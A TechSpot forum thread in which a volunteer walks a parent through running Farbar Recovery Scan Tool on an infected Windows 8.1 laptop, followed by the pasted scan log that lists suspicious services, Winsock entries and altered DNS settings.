TechSpot

Pretty sure our laptop has a virus/malware but don't know what to do - need step-by-step instruction

By Gitanjali
Jan 10, 2016
  1. Hi,

    Sorry about this - not too sure who to turn to as I think that with your help, I could be able to fix this problem. Kids downloaded something and then computer started acting up. Can't even do anything unless I'm in safe mode. Laptop runs Windows 8.1 and it is a few years old as it came from the kids' father. I can email the jpg screenshot. Would appreciate any help/assistance you could offer.

    Kind regards,
    Not too tech-savvy single mom
     
  2. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    Welcome aboard

    Please, complete all steps listed here: http://www.techspot.com/vb/topic58138.html
    Make sure you PASTE all logs. If a log exceeds the 50,000-character post limit, split it between a couple of replies.
    Attached logs won't be reviewed.

    Please observe the following rules:
    • Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
    • If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer behavior, good, or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
     
  3. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Thanks for the prompt response; however, I can't even start as I can't get anything open, as the message takes up the whole screen and the keyboard seems to be unresponsive. I now can't get into safe mode and have tried a few times. Still wondering where to start. Thanks for taking the time to help :)
     
  4. Broni

    NOTE 1. Use another working computer to download Farbar Recovery Scan Tool. Use a USB flash drive to transfer it from the good computer to the bad one.
    NOTE 2. Install Panda USB Vaccine, or BitDefender’s USB Immunizer on GOOD computer to protect it from any infected USB device.

    For x32 (x86) bit systems download Farbar Recovery Scan Tool 32-Bit and save it to a flash drive.
    For x64 bit systems download Farbar Recovery Scan Tool 64-Bit and save it to a flash drive.

    Plug the flash drive into the infected PC.

    If you are using Windows 10: if you're having problems accessing System Recovery Options, create a Windows 10 USB or DVD as described here: http://betanews.com/2015/07/29/how-...your-own-installation-usb-flash-drive-or-dvd/ and boot from it.

    If you are using Windows 8, consult How to use the Windows 8 System Recovery Environment Command Prompt to enter the System Recovery Command Prompt. To access Advanced Boot Options, start and shut down the computer TWICE. On the third start you should see Advanced Boot Options.

    If you are using Vista or Windows 7, enter System Recovery Options.

    To enter System Recovery Options from the Advanced Boot Options:
    • Restart the computer.
    • As soon as the BIOS is loaded, begin tapping the F8 key until Advanced Boot Options appears.
    • Use the arrow keys to select the Repair your computer menu item.
    • Select US as the keyboard language settings, and then click Next.
    • Select the operating system you want to repair, and then click Next.
    • Select your user account and click Next.

    To enter System Recovery Options by using Windows installation disc:
    • Insert the installation disc.
    • Restart your computer.
    • If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
    • Click Repair your computer.
    • Select US as the keyboard language settings, and then click Next.
    • Select the operating system you want to repair, and then click Next.
    • Select your user account and click Next.

    On the System Recovery Options menu you will get the following options:

    • Startup Repair
    • System Restore
    • Windows Complete PC Restore
    • Windows Memory Diagnostic Tool
    • Command Prompt
    • Select Command Prompt
    • In the command window type notepad and press Enter.
    • Notepad opens. Under the File menu select Open.
    • Select "Computer", find your flash drive letter, and close Notepad.
    • In the command window type e:\frst (for the x64 version type e:\frst64) and press Enter.
      Note:
      Replace letter e with the drive letter of your flash drive.
    • The tool will start to run.
    • When the tool opens click Yes to disclaimer.
    • Press Scan button.
    • It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
     
  5. Gitanjali

    Thanks! Will get on it, as I've now been able to get into safe mode!
     
  6. Broni

    Cool :)
     
  7. Gitanjali

    Just a quick question - if I've already backed up my data and have a reboot USB that will put my computer back to factory settings and supposedly wipe the system clean, should I do that instead? I know that you've given me detailed advice (which I truly appreciate), but I'm wondering, won't that be the easiest way to restart from scratch, or do you think it best not to do that at all?
     
  8. Broni

    Not sure what to tell you.
    It must be your call.
     
  9. Gitanjali

    Okay - so I'm reading all of the steps

    How do you tell, for the instructions below? System Information? Older computers are 32-bit... correct, so anything over 10+ years?

    For x32 (x86) bit systems download Farbar Recovery Scan Tool 32-Bit and save it to a flash drive.
    For x64 bit systems download Farbar Recovery Scan Tool 64-Bit and save it to a flash drive.
     
  10. Broni

    Incorrect version will simply throw an error so you can't break anything by trying.
     
  11. Gitanjali

    Okay, scan is running - I'm thinking that once it's done a dialogue box should pop up? Right? Any idea as to how long it takes, as the tool is now not responding and the command prompt has now gone back to flashing. I'd like to take out the USB but don't want to until it is safe to do so.
     
  12. Gitanjali

    Sorry another couple of quick questions

    - What do you do with the log after I post it? I'm hoping that you'll continue to give me detailed instructions on how to remove whatever it is on the system.

    - Are you on Pacific Time? As I'd like to see if it's at all possible to get this fixed asap.

    Again - thanks for your help :)
     
  13. Gitanjali

    So here it is:

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-01-2015 01
    Ran by owner (administrator) on ACER (10-01-2016 18:13:23)
    Running from E:\
    Loaded Profiles: owner (Available Profiles: owner)
    Platform: Windows 8.1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser not detected!)
    Boot Mode: Safe Mode (minimal)
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-10] (Realtek Semiconductor)
    HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212048 2012-06-07] (Realtek Semiconductor)
    HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
    HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
    HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-08-10] ()
    HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
    HKLM\...\Run: [Sound+] => "C:\Program Files\Sound+\Sound+.exe"
    HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508256 2012-04-23] (Dolby Laboratories Inc.)
    HKLM-x32\...\Run: [LManager] => [X]
    HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
    HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
    HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [708496 2015-07-22] (Cisco Systems, Inc.)
    HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
    HKLM-x32\...\Run: [oasi_en_323010107] => [X]
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [uTorrent] => C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-02] (BitTorrent Inc.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify Web Helper] => C:\Users\owner\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-21] (Spotify Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50378880 2015-12-17] (Skype Technologies S.A.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify] => C:\Users\owner\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-21] (Spotify Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Birds] => C:\Users\owner\AppData\Local\Birds\birds365.exe [113664 2016-01-09] (Birds)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
    AppInit_DLLs: C:\ProgramData\Medlight\Icenix.dll => No File
    AppInit_DLLs-x32: C:\ProgramData\Medlight\Topstrong.dll => No File
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2016-01-10]
    ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
    GroupPolicy: Restriction - Chrome <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 16 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 75.153.176.1
    Tcpip\..\Interfaces\{1CF1C519-43BC-43DC-A100-5452BECE63BD}: [DhcpNameServer] 192.168.1.254 75.153.176.1
    Tcpip\..\Interfaces\{22E2DD4D-5728-4E97-8740-AA750D016189}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{3D911366-3BDF-44E8-8347-B89013568C76}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{559265AC-3060-4BF7-B113-B1CA25913253}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{6504a844-a2c7-11e4-824e-806e6f6e6963}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [DhcpNameServer] 192.168.42.129

    Internet Explorer:
    ==================
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
    SearchScopes: HKLM -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
    SearchScopes: HKU\S-1-5-21-3773202632-424774445-890114178-1001 -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
    BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
    BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10] (Qualcomm Atheros Commnucations)
    BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-31] (Oracle Corporation)
    BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-31] (Oracle Corporation)
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
    Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
    StartMenuInternet: IEXPLORE.EXE - iexplore.exe

    FireFox:
    ========
    FF ProfilePath: C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default
    FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
    FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/.com/?site=shyosffdefault&prd=set_ff&s=G1Azbwybl01,2e5a8f18-7777-4848-9eed-2132ef3331e1,
    FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2015-12-28] ()
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2015-12-28] ()
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
    FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-31] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-31] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
    FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll [2014-11-14] ()
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-09-30] (Adobe Systems Inc.)
    FF user.js: detected! => C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\user.js [2016-01-09]
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-10-03]
    FF Extension: McAfee WebAdvisor - C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\extensions\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}.xpi [2015-08-04] [not signed]
    FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
    FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
    FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    StartMenuInternet: FIREFOX.EXE - firefox.exe

    Chrome:
    =======
    CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-09]
    CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-09]
    CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-09]
    CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-09]
    CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-09]
    CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1
    CHR Extension: (Google Slides) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-25]
    CHR Extension: (Google Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-25]
    CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-25]
    CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-25]
    CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-25]
    CHR Extension: (Google Sheets) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-25]
    CHR Extension: (SiteAdvisor) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-25]
    CHR Extension: (Google Docs Offline) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-25]
    CHR Extension: (Taplika New Tab) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lfkjojacgdjkninepeghaamnapdjmlfn [2015-11-25]
    CHR Extension: (Skype Click to Call) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-11-25]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-25]
    CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-25]
    CHR HKLM\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
    CHR HKLM-x32\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S2 AmazingTab; C:\Program Files\amztab\amztab.exe [383488 2016-01-09] () [File not signed]
    S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
    S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe [538112 2016-01-09] () [File not signed]
    S2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [211584 2012-08-10] (Qualcomm Atheros Commnucations) [File not signed]
    S2 BrcmCardReader; C:\Program Files\Broadcom\MemoryCard\BrcmCardReader.exe [176640 2012-08-20] (Broadcom Corp.) [File not signed]
    S2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
    S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
    S2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
    S2 cmdidx; C:\Program Files\cmdidx\cmdidx.exe [383488 2016-01-09] () [File not signed]
    S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
    S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
    S2 extradoynldownkzhd; C:\Users\owner\AppData\Local\Donelectronics.exe [28160 2016-01-09] () [File not signed]
    S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
    S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
    S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
    S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
    S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
    S2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation)
    S2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-10-09] (Dritek System INC.)
    S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [836176 2015-12-14] (Valve Corporation) [File not signed]
    S2 Task Server; C:\Program Files\Task Server\TaskServer.exe [796160 2016-01-09] (Copyright © Microsoft 2015) [File not signed]
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
    S2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-07-31] (Atheros) [File not signed]
    S2 Gejdiubx; "C:\Users\owner\AppData\Roaming\RujgAjueocf\Remdhuus.exe" -cms [X]

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-08-10] (Qualcomm Atheros)
    S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
    S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
    R0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
    S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
    S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-10] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
    S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
    R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-10-09] (Dritek System Inc.)
    S3 usbrndis6; C:\Windows\system32\DRIVERS\usb80236.sys [20992 2013-08-22] (Microsoft Corporation)
    S3 voxaldriver; C:\Windows\system32\DRIVERS\voxaldriverx64.sys [34512 2015-10-26] ()
    S3 vpnva; C:\Windows\system32\DRIVERS\vpnva64-6.sys [52592 2014-10-16] (Cisco Systems, Inc.)
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44024 2015-02-03] (Microsoft Corporation)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [264000 2015-02-03] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
    S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
    S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

